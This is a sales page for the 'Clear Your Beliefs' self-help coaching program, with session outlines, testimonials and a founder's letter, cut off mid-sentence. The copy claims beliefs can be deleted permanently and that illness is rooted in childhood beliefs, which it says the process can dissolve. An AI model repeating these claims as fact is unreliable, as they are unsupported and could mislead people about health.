<strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome 